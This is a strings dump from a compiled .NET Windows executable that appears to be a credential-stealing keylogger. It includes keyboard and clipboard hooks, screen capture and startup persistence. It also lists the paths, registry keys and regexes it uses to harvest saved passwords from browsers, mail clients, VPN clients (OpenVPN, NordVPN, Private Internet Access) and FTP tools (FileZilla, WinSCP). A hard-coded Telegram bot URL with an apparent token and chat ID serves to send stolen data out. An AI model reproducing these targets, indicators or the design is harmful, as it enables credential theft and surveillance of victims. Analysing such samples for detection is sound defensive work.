!This program cannot be run in DOS mode.
`.rsrc
@.reloc
com.apple.Safari
Unable to resolve HTTP prox
1SPS*
KDBM((
v4.0.30319
#Strings
% > H P V ` h
! 9 Y }
1C1-1 1f
!i"r"y"
Dduk09qp40
bFeOH0
oFEEKl4elH0
cTRMtRCSO0
i3uYToX0
iXIw0Y0
oh7fExRj0
$$method0x6000120-1
$$method0x6000191-1
$$method0x6000105-1
$$method0x6000115-1
$$method0x6000255-1
$$method0x600011a-1
$$method0x600008c-1
$$method0x600007d-1
$$method0x600011f-1
$$method0x600013f-1
$$method0x60000ff-1
DneR81
HMACSHA1
MPTeZh18H1
VT_UI1
OHfYTyqM1
7RygetIlSP1
SJZ3RZ1
IEnumerable`1
ICollection`1
IEnumerator`1
IList`1
CS$<>9__CachedAnonymousMethodDelegate1
MNwYRP64Mj1
get_Item1
WBU6njt1
WDBz1pw1
$$method0x6000115-2
$$method0x6000255-2
$$method0x60000ff-2
HMACSHA512
Advapi32
kernel32
Microsoft.Win32
user32
ToUInt32
ReadInt32
ToInt32
bo8M9XB42
HeZURpsF2
VT_UI2
WSIlHEEWQ2
ODVdX2
KeyValuePair`2
Dictionary`2
eB3bfk2
get_Item2
ZQjHt2
0vNont2
EShsqvw2
kt2y6G33
wQptOUi33
yt4D7dwu383
5tKXcVD3
lbgc8FP3
Tuple`3
yGpt01bS0d3
ioBNd3
Vvdf8g2g3
get_Item3
2mb9z3
ToUInt64
ReadInt64
ToInt64
EiDsPUqXC4
VT_UI4
ZP2V79u8K4
EWENL4
PEDXYX4
4vGYg4
xClDrzj4
yZM6Yv15
qWFiuXY85
yXy8GmOFZB5
VJF6BUVPjL5
kQBLW5
6yGeb3vh5
ksDN1n916
IS_TEXT_UNICODE_ASCII16
IS_TEXT_UNICODE_REVERSE_ASCII16
ToUInt16
ReadInt16
ToInt16
HMACSHA256
vEDwzgPjEB6
1oZnlO6
abwk9YIQ7Q6
QW5QU6
MNKO86b6
8Kf5JL39vx6
6tSQK3mvQ97
XsiIDKdB7
HkArH7
VaultGetItem_WIN7
XVEPmQ7
lWx3MzQ7
inBTS7
9j9MqqnV7
uvficQLQ2g7
McCFMTW58
get_UTF8
VT_UI8
VaultGetItem_WIN8
ZyteK4hX8
2T1H1iLY8
MRDpae8
iDShmvkpx9
<Module>
fsHGTx0A
Jv8Sb3A
7as78kmx3eA
ibhnbanvlA
QvqQrq7oA
0PHYovA
1qwhxA
6sePpA9h2B
B8Xvztwe8B
3dOkVGB
6fkBuJB
RmDu5vXtNB
BCRYPT_KEY_DATA_BLOB
VT_BLOB
tJlgFbB
5xdbpB
PxzS3iqB
LggaVzB
BCRYPT_KEY_DATA_BLOB_MAGIC
uIxLuf6ZJC
NP2eb2PwPC
TBuvQC
q71qhC
bEOnvxyhC
ctRaiC
eMPHjC
D0Aktbnp9mC
LLKHF_EXTENDED
LLKHF_INJECTED
8WbOFD
VT_CLSID
get_ID
set_ID
FileHandleID
fileHandleID
lpdwProcessID
processID
get_FormatID
set_FormatID
RBu1ULRD
db16MbFWSD
QJJNMraYD
EesQGZD
OZ2zdD
SFJmDogD
XP52xN4uY7E
H2DBWYf9E
DUPLICATE_CLOSE_SOURCE
BCRYPT_CHAINING_MODE
VT_STORAGE
INVALID_HANDLE
VT_FILETIME
IS_TEXT_UNICODE_SIGNATURE
IS_TEXT_UNICODE_REVERSE_SIGNATURE
VT_DATE
IS_TEXT_UNICODE_DBCS_LEADBYTE
5xmZFUE
mWbGUmE
RhHe0sE
6kcpVKP8F
bEhycx3CF
8G5bHF
mTIxL2GObF
CB2qS6eF
TQ9MXjF
x1gTBokF
Dl3SO7lklF
s9eHI9G
BCRYPT_AUTH_MODE_CHAIN_CALLS_FLAG
ZjTo6Ps9HG
rV88QG
mQalwYRWG
rcZOJgOqPoG
n0MlQcIsX0H
slQZq8H
zDqoHAH
sNRKCH
STATUS_AUTH_TAG_MISMATCH
STATUS_INFO_LENGTH_MISMATCH
LvBBTyuPH
IS_TEXT_UNICODE_ODD_LENGTH
BCRYPT_AUTH_TAG_LENGTH
BCRYPT_OBJECT_LENGTH
mk9xDO2VH
RT1nlCbpVVH
mo1JCA7QYH
hUQ4ioHq8jH
6xAxJB7klH
mZP3LAI
WHo4DosrCI
get_ASCII
aAxCwKI
huoAhI
ghTGciarI
5d5v60i3itI
NhcSGhHxRIJ
vcgvRWJ
yaxRnBXJ
hr704oIlJ
Ca2MyJ
B9Ry4szJ
bVN1Y7o0K
SgZs5K
IS_TEXT_UNICODE_UNICODE_MASK
IS_TEXT_UNICODE_NOT_UNICODE_MASK
IS_TEXT_UNICODE_REVERSE_MASK
IS_TEXT_UNICODE_NOT_ASCII_MASK
sPwzZ98CYUK
av9WxBUWK
O7WoPNZ29YK
fvvfJYK
Xxsvb2TIWbK
PzW8eK
fCVyxQLsK
d1OKkc0L
VT_DECIMAL
heOeBL
QTtGXm6EL
VT_NULL
WH_KEYBOARD_LL
VT_BOOL
MiMpj1XafL
ONyotiL
9yElFlL
UxPIRKW5SlL
bSMpjVy5zL
0nPcJ5pUn0M
AFxjk8M
VT_VERSIONED_STREAM
VT_STREAM
BCRYPT_CHAIN_MODE_GCM
BCRYPT_AES_ALGORITHM
OLkMORKM
wM9SpTmdNM
Hj93pw6I9lM
Lw3JhzOr0yM
LVWFz6EN
BCRYPT_INIT_AUTH_MODE_INFO_VERSION
HC_ACTION
LLKHF_ALTDOWN
WM_SYSKEYDOWN
WM_KEYDOWN
l8pDFKOwN
tpZRzN
kODc7O
b21a4BO
AuJ8p38DO
System.IO
Rbcw8gO
qGSZ9jEiO
cZc9w9DP
BCRYPT_PAD_OAEP
ah4egEP
w4UOCZOP
WM_SYSKEYUP
WM_KEYUP
LLKHF_UP
cEG0eP
zVTjKhP
vJUX3hH1SiP
pqEcNCDnP
jTDHzP
wffMJAaD78Q
RBpXjd8Q
mRqK9Q
Y1PaU0mPHQ
KsErmIQ
XCT3tJQ
xKZpzNKQ
FiEj2WRQ
ON3mrVsRQ
7YzPKTQ
jNBI1N6jbQ
8Ccj0cxdQ
CzhrJJiQ
D7jBsQ
kB6Wir2C4R
T0a87R
MS_PRIMITIVE_PROVIDER
mrVi2HR
4KT6Dlzi7MR
eJlRcMR
VT_ERROR
VT_VECTOR
VT_BSTR
VT_LPSTR
VT_LPWSTR
FDr4EmTR
pG2ydR
AQ9QNUN2hR
fhMemR
phk4ZVKPwR
Xr0uZbLAzR
5ZdmSiumvzR
Z7pKaB0S
X5w2l7S
E9CPhBS
IS_TEXT_UNICODE_STATISTICS
IS_TEXT_UNICODE_REVERSE_STATISTICS
SuOBmHDS
IS_TEXT_UNICODE_NULL_BYTES
zgMacDIaJS
IS_TEXT_UNICODE_CONTROLS
IS_TEXT_UNICODE_REVERSE_CONTROLS
eShbgSPS
IS_TEXT_UNICODE_ILLEGAL_CHARS
DUPLICATE_SAME_ACCESS
ERROR_SUCCESS
STATUS_SUCCESS
BCRYPT_PAD_PSS
QWSTTS
hWY1DKShZTS
nIDU02psWS
jwb5VZS
cjMUNFpiS
c4mZtcW9rS
Bd3JfleHA2T
VT_UINT
VT_INT
u9oXhkHST
2tBXoXxeYT
MfOb21mfYT
hQChfT
RFOoG8mujhT
VSS1nXBrT
NRuy7UHtwDU
r9JllWeOWU
k94Uu6S5kU
fnzG03DkU
oVQTjyrU
tX7A4V
4GKRlZU8V
get_IV
set_IV
M0qpnlTV
RvkLYV
N1NSYYV
ZmUjcV
kO1bNpV
66xvyV
U4Myz0W
5tVvoyY5W
HTVymHW
STATUS_BUFFER_OVERFLOW
DOk415T7QW
MM1vfzmVPYW
2OCcQTkO1cW
eT8Y5Jf4X
FNP0m4Cke5X
im3umI5zCX
uONobGqNGX
oWqNbHNX
902NvSX
s7vlU1F4fXX
gKg5VWZX
2YC17FN4Y
4lHFxuMvv8Y
VT_ARRAY
2ZKHzski6BY
Xwk1RY
VT_EMPTY
uvyKuszsfY
TlTKWjszBnY
RLirkuLqY
SjOY8qv45Z
n1ELAN5Z
Kpw5w6Z
MQg7Mc7Z
IUTcv7zPqMZ
value__
R4ka050a
bjihYEFa
ligKBFFa
R7lCIjKa
T9FLkJHLa
uwcD3Na
rkKJ87GMBja
NFRZWbcsa
k8glGta
get_Data
set_Data
cbData
ProtectedData
cbAuthData
pbAuthData
PropertyData
SetQuota
qHIY2b
o3Mu9YVz4b
DwHRvCcpX5b
VPf9Hb
2nkT85Mb
nAV6Rb
nGPITb
8LwfmtuYgVb
PublicIpAddressGrab
mscorlib
cKlD4Mrb
VkFBPk6sS3c
hOuwxneTVBc
AFu8ZiL1Lc
5pGgRMc
CvdKVlOhc
System.Collections.Generic
Microsoft.VisualBasic
WndProc
HookProc
f0mLJohbuoc
pBGVpc
9ZUSxD7Rsc
dEJ56WUsc
FromFileTimeUtc
eCqH2tRl9wc
r5H7ZE00d
04fa7bea-03e6-4a3d-949f-ac9a3ae6946d
RedsZDA3nAd
get_Id
SchemaId
schemaId
pszAlgId
HookId
GetWindowThreadProcessId
processId
ChatId
SchemaElementId
dSpxyYMd
PageExecuteRead
OpenRead
FileMapRead
VirtualMemoryRead
CreateThread
lpcbNeeded
DomainExtended
SHA1Managed
RijndaelManaged
add_Changed
remove_Changed
get_LastModified
set_LastModified
_lastModified
Interlocked
set_Enabled
get_IsEnabled
set_IsEnabled
_enabled
Undefined
lpOverlapped
samDesired
add_Elapsed
get_LastAccessed
set_LastAccessed
_lastAccessed
get_Reserved
reserved
System.Collections.Specialized
ScfcKOhd
TorPid
activeWindowPid
pPackageSid
row_id
get_IsInvalid
get_Guid
vaultGuid
PcHwid
<ID>k__BackingField
<FormatID>k__BackingField
<Data>k__BackingField
<LastModified>k__BackingField
<IsEnabled>k__BackingField
<LastAccessed>k__BackingField
<Password>k__BackingField
<password>k__BackingField
<PropertyStorage>k__BackingField
<Name>k__BackingField
<FileName>k__BackingField
<ApplicationName>k__BackingField
<Username>k__BackingField
<username>k__BackingField
<Type>k__BackingField
<type>k__BackingField
<TypedPropertyValue>k__BackingField
<Size>k__BackingField
<IsRunning>k__BackingField
<Path>k__BackingField
<hostmask>k__BackingField
<Version>k__BackingField
<Application>k__BackingField
<Description>k__BackingField
<user>k__BackingField
<hoster>k__BackingField
<Tasks>k__BackingField
<objects>k__BackingField
<Accounts>k__BackingField
<Keys>k__BackingField
<Lenght>k__BackingField
<Host>k__BackingField
<GuidMasterKey>k__BackingField
GetField
GXzhLrmmd
TrimEnd
ReadToEnd
AppEnd
Append
get_Millisecond
GetUpperBound
GetLowerBound
mZf4oaM1Iod
set_Method
method
Clipboard
get_Password
set_Password
DomainPassword
get_password
set_password
dNEszXM6Wud
tpJ4yd
Replace
DeleteBackspace
QueryDosDevice
hInstance
IdentityReference
Sequence
cbNonce
pbNonce
Resource
vkCode
wScanCode
scanCode
keyCode
set_Mode
FileMode
ShareMode
PaddingMode
CryptoStreamMode
CipherMode
SelectSingleNode
XmlNode
get_Unicode
get_BigEndianUnicode
IsTextUnicode
FromImage
SectionImage
get_PropertyStorage
set_PropertyStorage
SerializedPropertyStorage
SendMessage
AddRange
CompareExchange
CredentialCache
SectionNoCache
EndInvoke
BeginInvoke
fNQhhPNCle
r03xYle
GetEnvironmentVariable
SetEnvironmentVariable
IEnumerable
IDisposable
ToDouble
get_Handle
RuntimeFieldHandle
hSourceHandle
SafeHandle
GetModuleHandle
RuntimeTypeHandle
ReleaseHandle
CloseHandle
DuplicateHandle
CreateHandle
GetTypeFromHandle
hSourceProcessHandle
hTargetProcessHandle
lpTargetHandle
bInheritHandle
vaultHandle
activeWindowHandle
handle
Rectangle
ToSingle
CreateFile
hTemplateFile
DeleteFile
WriteFile
MoveFile
MapViewOfFile
UnmapViewOfFile
lastTitle
activeWindowTitle
lphModule
get_MainModule
ProcessModule
get_Name
set_Name
lpDeviceName
get_FileName
set_FileName
GetModuleFileName
lpExistingFileName
lpFileName
GetFileName
lpNewFileName
_fileName
get_ModuleName
lpModuleName
lpBaseName
baseName
lpValueName
StartupRegName
rootPathName
get_OSFullName
get_FullName
OperatingSystemName
get_ApplicationName
set_ApplicationName
StartupInstallationName
lpName
lpAppName
get_UserName
get_ComputerName
ThisComputerName
ProcessorName
get_ProcessName
processName
StartupEnvName
GetProcessesByName
lpKeyName
pszCredentialFriendlyName
StartupDirectoryName
GetDirectoryName
astable_name
item_name
Filename
filename
get_Username
set_Username
get_username
set_username
DateTime
GetLastAccessTime
dwTime
AppendLine
get_NewLine
Combine
LocalMachine
Escape
Unescape
DataProtectionScope
get_Type
set_Type
pszBlobType
GetFileType
MimeType
ValueType
LogType
SecurityProtocolType
GetType
set_ContentType
item_type
get_type
set_type
FileShare
Compare
System.Core
PtrToStructure
get_InvariantCulture
Capture
NameObjectCollectionBase
HttpWebResponse
GetResponse
Dispose
Reverse
X509Certificate
GenericCertificate
DomainCertificate
Create
KBDLLHookProcDelegate
MulticastDelegate
Terminate
PcState
GetKeyboardState
lpKeyState
GetKeyState
Delete
PageReadWrite
PageExecuteReadWrite
nNumberOfBytesToWrite
FileMapWrite
VirtualMemoryWrite
Remote
STAThreadAttribute
CompilerGeneratedAttribute
GuidAttribute
SecuritySafeCriticalAttribute
ExtensionAttribute
AssemblyFileVersionAttribute
FlagsAttribute
CompilationRelaxationsAttribute
ReliabilityContractAttribute
ParamArrayAttribute
RuntimeCompatibilityAttribute
SuppressUnmanagedCodeSecurityAttribute
set_UseShellExecute
FileMapExecute
ReadByte
ToByte
1ElXJue
get_Value
HandleValue
TryGetValue
get_TypedPropertyValue
set_TypedPropertyValue
GetPropertyValue
set_KeepAlive
Remove
SectionReserve
get_Size
set_Size
dataSize
cbSize
get_StorageSize
lpFileSize
get_NameSize
volumeNameSize
nFileSystemNameSize
SQLDataTypeSize
get_StoreSize
get_ValueSize
get_HashSize
set_BlockSize
chunkSize
get_KeySize
Serialize
Deserialize
Initialize
Finalize
Synchronize
page_size
Resize
YZUogpnhGf
u6G4M1Nf
IzmaNf
SizeOf
get_ItemOf
LastIndexOf
iyOEdapPf
yNOzXK6dXf
jCl4Q6WqQYf
cchBuff
zkkDZnjf
C9pAqAubumf
lastInputInf
OfER1ay0sf
1H1pLMsf
xahMut2cltf
PF06oHg
JgrIUg
get_Jpeg
System.Threading
get_Padding
set_Padding
UTF8Encoding
encoding
System.Drawing.Imaging
get_IsRunning
set_IsRunning
CreateFileMapping
FromBase64String
ToBase64String
EscapeDataString
UnescapeDataString
lpReturnedString
GetPrivateProfileString
ToString
GetString
OctetString
BitString
Substring
System.Drawing
7tkJPUnPfqg
LkpN6brg
get_Msg
uY7jgeL9h
MejljAh
VBcUPnQgaRh
04T36Cc7Uh
TKPeXh
dwMaximumSizeHigh
dwFileOffsetHigh
jlsToY7xOkh
4KnA7DVSkh
ComputeHash
get_Path
set_Path
SystemAppdataPath
get_ExecutablePath
AsmFilePath
AppStartupFullPath
GetTempPath
GetFolderPath
lpTargetPath
StartupDirectoryPath
get_Width
get_Length
MaximumLength
dwMinLength
SystemInformationLength
ObjectInformationLength
set_MaxJsonLength
ReturnLength
maximumComponentLength
GetWindowTextLength
dwMaxLength
EndsWith
StartsWith
7dsgizh
QWIkvCi
sbkUFKbi
Di6qgMcEhi
h06TDrOZki
PtrToStringUni
StringToHGlobalUni
TelegramApi
HqqVnBXYti
UPx9vgh5g1j
NDgUz3j
yMY0Cj
ndyKCj
iStw4UrNj
O9ooRj
ZbaViWcj
objrij
45lSoj
t1FGLWm9hsj
v9f3lTyj
4CfOLNk
AsyncCallback
RemoteCertificateValidationCallback
get_ServerCertificateValidationCallback
set_ServerCertificateValidationCallback
callback
get_CapsLock
TransformFinalBlock
TransformBlock
idHook
_clipboardHook
_keyboardHook
ogq3XG4Lpk
get_hostmask
set_hostmask
sEvgDVvk
CTEbFsex5l
eeWp76l
VOf5o4TtAl
URjY0Bl
sfa1fFThIl
AllocHGlobal
FreeHGlobal
Illegal
Marshal
Decimal
System.Security.Principal
set_Interval
ScreenInterval
KeyloggerInterval
Rijndael
cbLabel
pbLabel
System.ComponentModel
EnableTorPanel
Kernel32.dll
kernel32.dll
User32.dll
user32.dll
vaultcli.dll
psapi.dll
ntdll.dll
bcrypt.dll
System.Xml
set_SecurityProtocol
Control
S1MNrl
88shHKHXfwl
NMSZXWCAMm
DMnXf5MbOm
pFYMvNSm
FGO2PGTm
46LtYYZm
FileStream
get_BaseStream
GetResponseStream
CryptoStream
GetRequestStream
MemoryStream
get_LParam
get_WParam
get_Param
lParam
wParam
2KAxpcm
get_Item
set_Item
VaultGetItem
vaultItem
OperatingSystem
HmacAlgorithm
SymmetricAlgorithm
phAlgorithm
KeyedHashAlgorithm
algorithm
RoLUQhCjm
Random
ICryptoTransform
Maximum
root_num
5Lp7Mugwm
jfouM750n
aNReu4On
zGvD6On
ToBoolean
IsLittleEndian
CopyFromScreen
get_PrimaryScreen
lpNumberOfBytesWritten
X509Chain
ChangeClipboardChain
Extension
get_OSVersion
get_Version
set_Version
dwInfoVersion
get_Application
set_Application
get_Location
ObjectDataInformation
SystemRegistryQuotaInformation
SystemBasicInformation
ObjectBasicInformation
QueryLimitedInformation
SystemPerformanceInformation
SystemProcessorPerformanceInformation
SystemLookasideInformation
SystemHandleInformation
ObjectNameInformation
GetVolumeInformation
ObjectTypeInformation
ObjectAllInformation
NtQuerySystemInformation
SystemExceptionInformation
SystemProcessInformation
ObjectInformation
SetInformation
SystemInterruptInformation
SystemTimeOfDayInformation
QueryInformation
VirtualMemoryOperation
pszImplementation
System.Globalization
System.Web.Script.Serialization
System.Reflection
PropertyDataCollection
NameValueCollection
MatchCollection
GroupCollection
KeysCollection
ManagementObjectCollection
KeyCollection
set_Position
CreationDisposition
SearchOption
Win32Exception
CryptographicException
ArgumentOutOfRangeException
ArgumentException
get_Description
set_Description
get_StatusDescription
_description
System.Runtime.ConstrainedExecution
StringComparison
B01n2ytJ8qn
P6AVWVHnrn
GXdbtn
add_KeyDown
remove_KeyDown
get_CtrlKeyDown
get_ShiftKeyDown
get_AltKeyDown
Unknown
c2GxHX2o
mxRzBBo
YMAAEXGo
fPGELADJo
ae6w1yGBLo
CompareTo
CopyTo
Moi3f5Yo
vVWvYo
lastInPutNfo
dwExtraInfo
ImageCodecInfo
FieldInfo
FileInfo
CultureInfo
pPaddingInfo
FileSystemInfo
MemberInfo
ComputerInfo
get_StartInfo
ProcessStartInfo
GetLastInputInfo
DirectoryInfo
F78j2c4RBpo
qAA4ouo
VDBJ0rp5p
frbDvCp
OELI70Fp
dJKzKp
cXbtAmQp
add_KeyUp
remove_KeyUp
jUrkilZp
dwNumberOfBytesToMap
Bitmap
O7hNLlp
TimeStamp
LocalApp
FKCgIoRuetp
AppAddStartup
HideFileStartup
ijghIpmH9q
JO3xzmLI9q
VObHOYMEHq
LwYrgSq
4KEHsKHojTq
UfousUq
lwi7kvKnXq
EPAmM6eq
System.Linq
JWcwfSqq
DWkxMcRvtq
gIBJsj0r
bqIeLnVmwMr
ubPWKVr
cYP5sVnvWZr
ToChar
lpChar
DirectorySeparatorChar
GLsm9nBRer
ObjectTypeNumber
volumeSerialNumber
StreamReader
TextReader
BinaryReader
SHA1CryptoServiceProvider
MD5CryptoServiceProvider
RNGCryptoServiceProvider
TripleDESCryptoServiceProvider
BCryptCloseAlgorithmProvider
BCryptOpenAlgorithmProvider
IFormatProvider
StringBuilder
SpecialFolder
sender
Encoder
volumeNameBuffer
fileSystemNameBuffer
buffer
ServicePointManager
Integer
EnableClipboardLogger
EnableScreenLogger
_screenLogger
_keyLogger
EnableKeylogger
ManagementObjectSearcher
ObjectIdentifier
SecurityIdentifier
ElapsedEventHandler
LogTimer
ToUpper
CurrentUser
get_user
set_user
EncoderParameter
Object_Pointer
BitConverter
get_hoster
set_hoster
BinaryFormatter
SetClipboardViewer
ToLower
JavaScriptSerializer
u6UEVSlr
6atFEoUVknr
get_Major
get_Minor
GetLastWin32Error
GetLastError
Authenticator
IEnumerator
ManagementObjectEnumerator
GetEnumerator
RandomNumberGenerator
.cctor
Monitor
CreateDecryptor
CreateEncryptor
h9a7pr
a1661UOHqr
e1unrr
passwordVaultPtr
ReadIntPtr
oVacqgDHf3s
LrWeBJHDVDs
J35ugVs
r2IHWs
pHjIeKWs
Graphics
System.Diagnostics
get_Bounds
Microsoft.VisualBasic.Devices
System.Runtime.InteropServices
System.Runtime.CompilerServices
GetInstances
get_ChildNodes
Matches
EnableCookies
GetDirectories
master_table_entries
get_Properties
ExpandEnvironmentVariables
GetFiles
EnumProcessModules
NumberStyles
GetSubKeyNames
field_names
ReadAllLines
GetProcesses
System.Security.Cryptography.X509Certificates
FlagsAndAttributes
lpFileMappingAttributes
SecurityAttributes
FileBytes
Rfc2898DeriveBytes
ReadAllBytes
BufferBytes
GetBytes
db_bytes
get_Values
GetLogicalDrives
fileSystemFlags
dwFlags
ElapsedEventArgs
get_Ticks
get_Tasks
set_Tasks
ICredentials
set_Credentials
get_DefaultCredentials
Equals
CreateParams
VaultEnumerateItems
System.Windows.Forms
Contains
System.Web.Extensions
System.Text.RegularExpressions
iterations
System.Collections
set_MaximumAutomaticRedirections
StringSplitOptions
RegexOptions
options
get_Groups
get_Chars
GetImageEncoders
System.Timers
RuntimeHelpers
EncoderParameters
SslPolicyErrors
SystemInformationClass
ObjectInformationClass
ManagementClass
dwDesiredAccess
GrantedAccess
FileAccess
FileMapAllAccess
processAccess
get_Success
CreateProcess
hProcess
OpenProcess
GetCurrentProcess
lpBaseAddress
PublicIpAddress
get_objects
set_objects
VaultEnumerateVaults
pPropertyElements
set_Arguments
get_Accounts
set_Accounts
get_Exists
get_Keys
set_Keys
get_ModifierKeys
SbB5nqrQYzs
gmB9ZKrsv7t
eoW505Ht
PiKyYOt
yjnhSt
YukBXt
cQRW18uaat
Concat
AppendFormat
ImageFormat
Subtract
VT_BLOB_Object
VT_STREAMED_Object
VT_STORED_Object
ManagementBaseObject
hFileMappingObject
hObject
ManagementObject
cbKeyObject
pbKeyObject
NtQueryObject
object
Collect
set_AllowAutoRedirect
flProtect
Unprotect
System.Net
s3KjuAgopet
offset
fzcJYft
eRKdzBht
get_Height
get_Lenght
set_Lenght
op_Explicit
SectionCommit
WaitForExit
wdzDxBo6Dlt
cbSalt
VaultOpenVault
get_Default
lpDefault
pcbResult
IAsyncResult
phkResult
result
DtRZs7p9nt
UnsignedInt
3azWyGGYPnt
set_UserAgent
PublicUserAgent
System.Management
pResourceElement
XmlElement
pAuthenticatorElement
pIdentityElement
dwIncrement
sql_statement
Environment
XmlDocument
get_Parent
GetParent
get_Current
content
get_Count
get_HandleCount
get_TickCount
vaultItemCount
set_IterationCount
dwPropertiesCount
vaultCount
Pf3W2mkDpt
BCryptDecrypt
BCryptEncrypt
TrimStart
AppStart
Convert
UnsignedShort
HttpWebRequest
XmlNodeList
ToList
MozillaBrowserList
ChromiumBrowserList
get_Host
set_Host
set_Timeout
GetKeyboardLayout
dwLayout
cbInput
pbInput
cbOutput
pbOutput
get_StandardOutput
set_RedirectStandardOutput
MoveNext
System.Text
LastCopiedText
KeylogText
ReadAllText
AppendAllText
get_InnerText
GetText
GetWindowText
Log_text
cbMacContext
pbMacContext
OfbXvyt
ngOizGLNBu
uBnQoEu
tesBfuQBwFu
YON62bMu
cEMjKSVWu
zCv9cu
jcD4J5fHdu
EeebYoftu
zyl6dX2v
sRgFsRSO8v
ZRWzcWxAv
vhh3Mv
Bdxm9gv
x4FZhgv
8bgYrxQviv
Iak2NfEGkv
e4kNpmv
OXzhdtnv
zWOuqto9w
biit48RWMw
t3NSXht39Uw
uldj8bw
Uw8Wrx6mw
b9IgGY0Almw
dwMaximumSizeLow
dwFileOffsetLow
get_Now
GetForegroundWindow
NativeWindow
set_CreateNoWindow
r9cGsw
ToUnicodeEx
GetModuleFileNameEx
RegQueryValueEx
GetFileSizeEx
UnhookWindowsHookEx
SetWindowsHookEx
CallNextHookEx
MaximumEx
RegOpenKeyEx
B4MiogwaaFx
bz3uJx
ucchMax
ytKZndx
BufferEndIndex
BlockIndex
BufferStartIndex
93HHAI1Npx
Nal1uXQAy
5e1OCCy
pXjO3IVEy
aVaixRMjpIy
z40mUBRcrZy
ProtectedArray
ToByteArray
InitializeArray
ToArray
ToCharArray
Consistency
ZMw1BMsdy
get_Key
set_Key
OpenSubKey
subKey
RegCloseKey
get_GuidMasterKey
set_GuidMasterKey
_guidMasterKey
ContainsKey
wVirtKey
hImportKey
BCryptImportKey
BCryptDestroyKey
RegistryKey
_wsftpkey
System.Security.Cryptography
GetExecutingAssembly
PageReadonly
Multiply
PageWriteCopy
BlockCopy
FileMapCopy
System.Runtime.Serialization.Formatters.Binary
AmountOfMemory
get_TotalPhysicalMemory
Directory
Registry
get_Capacity
Quality
op_Equality
op_Inequality
System.Security
System.Net.Security
Identity
IsNullOrEmpty
BCryptSetAlgorithmProperty
BCryptGetProperty
BCryptSetProperty
pszProperty
NPxxrxw6z
fJ3HOj7z
3jDuGTDz
YFmJlCGRz
ffU6Llz
Em4T4Oz6oz
TgZFbhDuz
EcKCBzz
$57c3df04-4058-42e3-b287-83314f9efaaf
WrapNonExceptionThrows
1.0.0.0
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
p p p!p"p#p$p%p&p'p(p)p*p+p,p-p.p/p0p1p2p3p4p5p6p7p8p9p:p;p<p=p>p?p@pApDpEpFpGpHpKpfy|y
k#n+n9
4 5 6!7"8#9$:%;&<'=(>)?*@+A,B-C0D4E5F6G7H8I9K:N;O=QATD]FcJuPvTwVxYy]z`
BACAIHJHQPVUWUXU\[cbedfdgdhdidjdml
image/jpeg
/log.tmp
text/html
yyyy-MM-dd HH:mm:ss
<br>OSFullName:
<br>Computer Name:
<br>RAM:
IP Address:
<br>User Name:
MM/dd/yyyy HH:mm:ss
Time:
<br>CPU:
User Name:
Recovered!
Time:
OSFullName:
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
https://api.telegram.org/bot6274305207:AAH5YPuidA8Ry1ixmINxRICUhFKpXUvENJg/
5895512224
appdata
mPPSr.exe
]</b> (
{KEYDOWN}
{CTRL}
{KEYLEFT}
{ENTER}
control
{NumLock}
{BACK}
{CAPSLOCK}
{KEYUP}
{ALT+F4}
{KEYRIGHT}
{PageUp}
{ALT+TAB}
{Insert}
{HOME}
{PageDown}
"
<br><hr>Copied Text: <br>
logins
IE/Edge
2F1A6504-0641-44CF-8BB5-3612D865F2E5
Windows Secure Note
3CCD5499-87A8-4B10-A215-608888DD3B55
Windows Web Password Credential
154E23D0-C644-4E6F-8CE6-5069272F999F
Windows Credential Picker Protector
4BF4C442-9B8A-41A0-B380-DD4A704DDB28
Web Credentials
77BC582B-F0A6-4E15-4E80-61736B6F3B29
Windows Credentials
E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
Windows Domain Certificate Credential
3E0E35BE-1B77-43E7-B873-AED901B6275B
Windows Domain Password Credential
3C886FF3-2669-4AA2-A8FB-3F6759A77548
Windows Extended Credential
00000000-0000-0000-0000-000000000000
SchemaId
pResourceElement
pIdentityElement
pPackageSid
pAuthenticatorElement
UC Browser
UCBrowser\
Login Data
journal
wow_logins
Safari for Windows
\Common Files\Apple\Apple Application Support\plutil.exe
\Apple Computer\Preferences\keychain.plist
<array>
<string>
</string>
<data>
</data>
<dict>
-convert xml1 -s -o "
\fixed_keychain.xml"
\Microsoft\Credentials\
\Microsoft\Protect\
credential
QQ Browser
\EncryptedStorage
Tencent\QQBrowser\User Data
Profile
\Default\EncryptedStorage
entries
category
Password
password_value
IncrediMail
PopPassword
SmtpPassword
Software\IncrediMail\Identities\
\Accounts_New
SmtpServer
EmailAddress
Eudora
Software\Qualcomm\Eudora\CommandLine\
current
Settings
SavePasswordText
ReturnAddress
Falkon Browser
startProfile=([A-z0-9\/\.\"]+)
profiles.ini
\browsedata.db
autofill
\falkon\profiles\
ClawsMail
\Claws-mail
\clawsrc
passkey0
master_passphrase_salt=(.+)
master_passphrase_pbkdf2_rounds=(.+)
\accountrc
smtp_server
address
account
\passwordstorerc
{(.*),(.*)}(.*)
Flock Browser
APPDATA
\Flock\Browser\
signons3.txt
DynDns
username=
password=
https://account.dyn.com/
ALLUSERSPROFILE
Dyn\Updater\config.dyndns
t6KzXhCh
Dyn\Updater\daemon.cfg
global
accounts
account.
username
password
Psi/Psi+
\Psi+\profiles
\accounts.xml
\Psi\profiles
OpenVPN
Software\OpenVPN-GUI\configs
Software\OpenVPN-GUI\configs\
auth-data
entropy
remote
USERPROFILE
\OpenVPN\config\
NordVPN
NordVpn.exe*
user.config
//setting[@name='Username']/value
//setting[@name='Password']/value
Private Internet Access
ProgramFiles(x86)
\Private Internet Access\data
%ProgramW6432%
Private Internet Access\data
\account.json
.*"username":"(.*?)"
.*"password":"(.*?)"
privateinternetaccess.com
FileZilla
\FileZilla\recentservers.xml
<Server>
<Host>
</Host>
<Port>
</Port>
<User>
</User>
<Pass encoding="base64">
</Pass>
<Pass>
CoreFTP
SOFTWARE\FTPWare\COREFTP\Sites
hdfzpysvpzimorhk
WinSCP
SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
HostName
UserName
PublicKeyFile
PortNumber
[PRIVATE KEY LOCATION: "{0}"]
ABCDEF
Flash FXP
quick.dat
Sites.dat
